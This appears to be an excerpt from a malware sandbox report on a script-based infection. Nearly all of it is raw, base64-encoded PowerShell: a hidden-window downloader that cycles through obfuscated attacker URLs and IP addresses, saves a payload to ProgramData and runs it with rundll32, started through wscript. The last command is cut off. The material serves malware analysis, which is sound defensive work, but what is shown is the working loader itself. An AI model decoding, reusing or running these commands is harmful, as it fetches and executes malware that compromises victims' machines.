bgBnAHQAaAAgAC0AZwBlACAAMgAwADEAMgA2ADYAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBjAGcAQgBsAEEARwBVAEEAZQBBAEIAdwBBAEcAdwBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAUgB3AEIAbABBAEcAOABBAFkAdwBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMAdwBBAGQAZwBCAHAAQQBIAEEAQQBjAHcAQQA3AEEARQAwAEEAUwBRAEIAVQBBAEUAdwBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgB6AEEARwBVAEEAIgA7ACQASQBtAG0AbwByAHQAYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAEUAQQBOAHcAQQB1AEEARABFAEEATwBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAGgAZQBtAG8AbQBlAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEASABNAEEAWgBRAEIAMQBBAEcAUQBBAGIAdwBCAGoAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAegBBAEgAUQBBAGEAQQBCAGwAQQBIAE0AQQBhAFEAQgBoAEEARQBVAEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAWQBRAEIAaQBBAEEAPQA9ACIAOwB9AH0AJABlAHAAaQBzAHQAbwBtAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAQQBCAGgAQQBHAGMAQQBhAFEAQgB2AEEASABBAEEAWQBRAEIAMABBAEcARQBBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQgBXAEEARwBFAEEAWgB3AEIAaABBAEgASQBBAGEAUQBCAGgAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAWQBRAEIAdABBAEcAOABBAGIAZwBCAGsAQQBIAE0AQQBnAGsATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQARQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEAMABBAEEAPQA9AGcAawBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGMAZwBCAHMAQQBHAGsAQQBjAHcAQgB0AEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQQB1AEEARwBZAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQAiADsAJABOAG8AbgBzAHAAZQBjAGkAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG0AQQBHAEUAQQBhAFEAQgAwAEEARwBnAEEAIgA7AA=="

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABOAG8AbgBkAGUAeAB0AGUAcgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEgAVQBBAGQAQQBCAHAAQQBHAE0AQQBiAEEAQgBsAEEARQAwAEEAWQBRAEIAeQBBAEcASQBBAGIAQQBCADUAQQBDADQAQQBiAGcAQgB5AEEASABjAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFkAQQBMAGcAQQAzAEEARABRAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQA1AEEAQQA9AD0AbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAeABBAEMANABBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABNAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYgB3AEIAeQBBAEcAMABBAFkAUQBCAHMAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAcwBBAEcARQBBAFkAdwBCAHYAQQBHAFEAQQBaAFEAQgB5AEEARwAwAEEAYQBRAEEAdQBBAEcANABBAFkAUQBCAG4AQQBHADgAQQBlAFEAQgBoAEEAQQA9AD0AIgA7ACQAUAByAG8AZAB1AGMAdABpAG8AbgBhAGwAUABhAHMAdABpAGwAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBjAGcAQgBsAEEARwB3AEEAYQBRAEIAdQBBAEcAYwBBAGIAQQBCADUAQQBFAEUAQQBiAGcAQgAwAEEARwBrAEEAYgB3AEIAdwBBAEcAawBBAGQAUQBCAHQAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcARQBBAFkAdwBCAG8AQQBBAD0APQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQB3AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AUQBBADEAQQBEAEkAQQAiADsAJABkAHIAbwBuAGUAcABpAHAAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFkAUQBCADAAQQBIAEkAQQBhAFEAQgBqAEEASABVAEEAYgBBAEIAaABBAEMANABBAFoAUQBCAHQAQQBHAEUAQQBhAFEAQgBzAEEAQQA9AD0AWgBrAEwAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABNAEEATABnAEEANABBAEQAawBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQA9AFoAawBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAegBBAEgAUQBBAFoAUQBCAGgAQQBHAFEAQQBhAFEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFoAdwBCAHkAQQBHAGsAQQBjAEEAQgBsAEEAQQA9AD0AIgA7ACQAcgB1AG4AbgBlAHQAVQBuAGQAZQBuAHUAbgBjAGkAYQB0AG8AcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATgB3AEEAeQBBAEEAPQA9AGYAWABNAFQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAYQBRAEIAMgBBAEcAawBBAGIAQQBCAGwAQQBDADQAQQBlAGcAQgBoAEEAQQA9AD0AZgBYAE0AVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBiAFEAQgBwAEEASABJAEEAWQBRAEIAdQBBAEcAZwBBAFkAUQBBAHUAQQBIAFEAQQBhAFEAQgBsAEEARwA0AEEAWgBBAEIAaABBAEEAPQA9ACIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADIAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMwBBAEQAVQBBAEwAdwBBAHoAQQBGAE0AQQBSAGcAQgAwAEEAQwA4AEEAUwBRAEIAUQBBAEQAWQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEANQBBAEQAVQBBAEwAdwBCAHoAQQBDADgAQQBlAGcAQgBWAEEASABrAEEATgBnAEEAegBBAEEAPQA9AE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABjAEEATABnAEEAeQBBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAMQBBAEMAOABBAFQAZwBBADIAQQBFAHcAQQBUAFEAQgBDAEEAQwA4AEEAUgBBAEIAdABBAEUAWQBBAGUAUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBWAEEARwA0AEEAYgBRAEEAeQBBAEcAWQBBAGUAQQBCAFkAQQBGAGcAQQBWAGcAQgBoAEEARABjAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAFoAQQBFAGMAQQBNAFEAQgBSAEEARgBZAEEAWgBnAEEAMwBBAEUAbwBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEUAWQBBAGQAUQBCAFAAQQBEAGcAQQBlAFEAQQA0AEEASABrAEEAZQBBAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAGwAaQB0AHQAZQByACAAaQBuACAAJABtAGEAYwByAG8AcwBlAGkAcwBtAGkAYwAgAC0AcwBwAGwAaQB0ACAAIgBOACIAKQAgAHsAJABSAGUAdABhAGMAawBsAGUAUwBoAGEAaABhAHIAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAZABRAEIAdQBBAEcANABBAGIAdwBCAHcAQQBIAE0AQQBhAFEAQgBrAEEARwBFAEEAWgBRAEEAdQBBAEcATQBBAGIAQQBCAGgAQQBHAGsAQQBiAFEAQgB6AEEAQQA9AD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAYQBBAEIAdgBBAEcASQBBAGEAUQBCAHYAQQBHAGMAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAcABBAEcATQBBAFkAUQBCAHMAQQBDADQAQQBjAFEAQgAxAEEARwBVAEEAWQBnAEIAbABBAEcATQBBACIAOwB0AHIAeQAgAHsAJABkAGkAcwByAG8AbwB0AFQAaQBtAG8AYwByAGEAdABpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABnAEEATQBRAEEAdQBBAEQAYwBBAE4AdwBBAD0AeABvAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATgBnAEEAMABBAEEAPQA9AHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATwBBAEEAMgBBAEMANABBAE4AdwBBADMAQQBBAD0APQAiADsAJABoAGUAbABpAG8AdAByAG8AcABlAFMAdABlAHIAaQBsAGkAegBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAGwAaQB0AHQAZQByACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAaABlAGwAaQBvAHQAcgBvAHAAZQBTAHQAZQByAGkAbABpAHoAaQBuAGcAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUAByAGUAZQB4AHAAbABvAGQAaQBuAGcALgBHAGUAbwBjAGgAZQBtAGkAYwBhAGwAOwAkAEEAcABwAG8AcgB0AGkAbwBuAGUAZABBAHMAdAByAG8AYwB5AHQAbwBtAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBWAEEARwA0AEEAYwB3AEIAMABBAEcAVQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBzAEEARwBrAEEAYQB3AEIAbABBAEMANABBAFoAUQBCAGgAQQBIAEkAQQBkAEEAQgBvAEEAQQA9AD0AdABKAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAbQBBAEgASQBBAGQAUQBCAHAAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAZwBCAHYAQQBIAFUAQQBkAEEAQgBwAEEASABFAEEAZABRAEIAbABBAEEAPQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBAHkAQQBEAEkAQQBOAFEAQQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEgAawBBAGMAdwBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQQA9ACIAOwAkAEcAcgBvAHcAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAGMAQQBjAGcAQgBwAEEARwBjAEEAWgB3AEIAcwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBZAHcAQgA1AEEARwAwAEEAYwBnAEIAMQBBAEEAPQA9AFoAWgBVAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANABBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBBAD0APQAiADsAJABQAG8AbAB5AG0AbwBsAHkAYgBkAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAWQBnAEIAdwBBAEgASQBBAGIAdwBCAG0AQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEcARQBBAGIAQQBCAFQAQQBHAEUAQQBhAFEAQgB1AEEASABRAEEAYgBBAEIANQBBAEMANABBAGMAdwBCADEAQQBIAEEAQQBjAEEAQgB2AEEASABJAEEAZABBAEEAPQBXAEMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQA1AEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATwBRAEEANQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAcgBlAGUAeABwAGwAbwBkAGkAbgBnAC4ARwBlAG8AYwBoAGUAbQBpAGMAYQBsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAwADEAMgA2ADYAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBjAGcAQgBsAEEARwBVAEEAZQBBAEIAdwBBAEcAdwBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAUgB3AEIAbABBAEcAOABBAFkAdwBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMAdwBBAGQAZwBCAHAAQQBIAEEAQQBjAHcAQQA3AEEARQAwAEEAUwBRAEIAVQBBAEUAdwBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgB6AEEARwBVAEEAIgA7ACQASQBtAG0AbwByAHQAYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAEUAQQBOAHcAQQB1AEEARABFAEEATwBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAGgAZQBtAG8AbQBlAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEASABNAEEAWgBRAEIAMQBBAEcAUQBBAGIAdwBCAGoAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAegBBAEgAUQBBAGEAQQBCAGwAQQBIAE0AQQBhAFEAQgBoAEEARQBVAEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAWQBRAEIAaQBBAEEAPQA9ACIAOwB9AH0AJABlAHAAaQBzAHQAbwBtAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAQQBCAGgAQQBHAGMAQQBhAFEAQgB2AEEASABBAEEAWQBRAEIAMABBAEcARQBBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQgBXAEEARwBFAEEAWgB3AEIAaABBAEgASQBBAGEAUQBCAGgAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAWQBRAEIAdABBAEcAOABBAGIAZwBCAGsAQQBIAE0AQQBnAGsATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQARQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEAMABBAEEAPQA9AGcAawBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGMAZwBCAHMAQQBHAGsAQQBjAHcAQgB0AEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQQB1AEEARwBZAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQAiADsAJABOAG8AbgBzAHAAZQBjAGkAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG0AQQBHAEUAQQBhAFEAQgAwAEEARwBnAEEAIgA7AA=="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 24, 2023, 11:05 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\Uncoupler.js" Superornamentally sapphicSloggers Tencteri filepath: wscript	1	1	0
ShellExecuteExW May 24, 2023, 11:05 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABOAG8AbgBkAGUAeAB0AGUAcgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEgAVQBBAGQAQQBCAHAAQQBHAE0AQQBiAEEAQgBsAEEARQAwAEEAWQBRAEIAeQBBAEcASQBBAGIAQQBCADUAQQBDADQAQQBiAGcAQgB5AEEASABjAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFkAQQBMAGcAQQAzAEEARABRAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQA1AEEAQQA9AD0AbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAeABBAEMANABBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABNAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYgB3AEIAeQBBAEcAMABBAFkAUQBCAHMAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAcwBBAEcARQBBAFkAdwBCAHYAQQBHAFEAQQBaAFEAQgB5AEEARwAwAEEAYQBRAEEAdQBBAEcANABBAFkAUQBCAG4AQQBHADgAQQBlAFEAQgBoAEEAQQA9AD0AIgA7ACQAUAByAG8AZAB1AGMAdABpAG8AbgBhAGwAUABhAHMAdABpAGwAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBjAGcAQgBsAEEARwB3AEEAYQBRAEIAdQBBAEcAYwBBAGIAQQBCADUAQQBFAEUAQQBiAGcAQgAwAEEARwBrAEEAYgB3AEIAdwBBAEcAawBBAGQAUQBCAHQAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcARQBBAFkAdwBCAG8AQQBBAD0APQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQB3AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AUQBBADEAQQBEAEkAQQAiADsAJABkAHIAbwBuAGUAcABpAHAAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFkAUQBCADAAQQBIAEkAQQBhAFEAQgBqAEEASABVAEEAYgBBAEIAaABBAEMANABBAFoAUQBCAHQAQQBHAEUAQQBhAFEAQgBzAEEAQQA9AD0AWgBrAEwAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABNAEEATABnAEEANABBAEQAawBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQA9AFoAawBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAegBBAEgAUQBBAFoAUQBCAGgAQQBHAFEAQQBhAFEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFoAdwBCAHkAQQBHAGsAQQBjAEEAQgBsAEEAQQA9AD0AIgA7ACQAcgB1AG4AbgBlAHQAVQBuAGQAZQBuAHUAbgBjAGkAYQB0AG8AcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATgB3AEEAeQBBAEEAPQA9AGYAWABNAFQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAYQBRAEIAMgBBAEcAawBBAGIAQQBCAGwAQQBDADQAQQBlAGcAQgBoAEEAQQA9AD0AZgBYAE0AVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBiAFEAQgBwAEEASABJAEEAWQBRAEIAdQBBAEcAZwBBAFkAUQBBAHUAQQBIAFEAQQBhAFEAQgBsAEEARwA0AEEAWgBBAEIAaABBAEEAPQA9ACIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADIAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMwBBAEQAVQBBAEwAdwBBAHoAQQBGAE0AQQBSAGcAQgAwAEEAQwA4AEEAUwBRAEIAUQBBAEQAWQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEANQBBAEQAVQBBAEwAdwBCAHoAQQBDADgAQQBlAGcAQgBWAEEASABrAEEATgBnAEEAegBBAEEAPQA9AE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABjAEEATABnAEEAeQBBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAMQBBAEMAOABBAFQAZwBBADIAQQBFAHcAQQBUAFEAQgBDAEEAQwA4AEEAUgBBAEIAdABBAEUAWQBBAGUAUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBWAEEARwA0AEEAYgBRAEEAeQBBAEcAWQBBAGUAQQBCAFkAQQBGAGcAQQBWAGcAQgBoAEEARABjAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEA